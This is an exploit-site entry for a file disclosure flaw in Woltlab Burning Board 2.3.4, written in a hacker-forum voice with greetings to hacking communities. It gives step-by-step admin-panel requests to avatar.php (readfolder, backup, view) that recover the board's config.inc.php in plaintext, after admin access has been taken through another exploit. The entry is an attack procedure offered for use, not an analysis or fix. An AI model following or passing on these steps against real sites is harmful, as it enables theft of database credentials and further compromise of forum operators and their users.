Woltlab Burning Board 2.3.4 - File Disclosure



EKU-ID: 21717 CVE: OSVDB-ID:
Author: sfx Published: 2010-11-12 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title: Woltlab Burning Board 2.3.4 File Disclosure Vulnerability
# Date: 2010-11-12
# Author: SFX
# Version: 2.3.4
# CVE : N/A

After you've used the Exploit to get the admin account:

goto: http://lolcathost/wbb/acp/avatar.php?action=readfolder

import: acp/lib

download a backup: http://lolcathost/wbb/acp/avatar.php?action=backup

goto: http://lolcathost/wbb/acp/avatar.php?action=view

search for: config.inc.php

after you know the name (for example avatar-17.php), goto the zip archive
and open avatar-17.php

that's the config.inc.php in plaintext

tested under 2.3.4, maybe other versions work too

Greetz to:
free-hack.com, back2hack.cc, hackerking, Omegavirus, BlackBerry, fred777,
Red Tiger, Samsa